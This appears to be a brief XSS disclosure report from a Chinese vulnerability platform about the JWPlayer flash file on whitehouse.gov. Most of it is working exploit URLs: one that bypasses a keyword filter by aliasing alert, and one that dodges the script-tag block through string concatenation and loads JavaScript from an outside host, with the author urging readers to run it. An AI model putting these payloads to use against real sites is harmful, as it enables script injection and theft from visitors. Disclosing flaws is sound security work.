WooYun.org

I hope my Chinese-Wind-English can be understood.
First, The Website of the WhiteHouse use a JWPlayer (a video player based on flash from longtailvideo, www.longtailvideo.com), and this player have a xss vulnerability.
Next, we could use this vulnerability to construct an evil link to attack potential victims. The codes are listed below!
The evil code can be run in both IE and Firefox, but crashed in Chrome (:( unkown reason).
The attack flow:
1. Simple Alert, However, we got a "Access Denied Error". The server seems to have some strange filter rules? Luckily, We can bypass this limitation.
Failed Code

http://www.whitehouse.gov/files/flash/player.swf?debug=function(){alert(1)}

Success Code

http://www.whitehouse.gov/files/flash/player.swf?debug=function(){var a=alert;a(1)}

2. We found some other sensetive words are also banned, such as <script></script>.
3. The code used above is runable but harmless. A more harmful code :

http://www.whitehouse.gov/files/flash/player.swf?debug=(function(){var s='scr'.concat('ipt');location.replace('javascript:"<b src=//appmaker.sinaapp.com/a.js></b>"'.replace(/b/g,s))})

4. Run it then known it. (in Chinese: 试试看你就知道了!)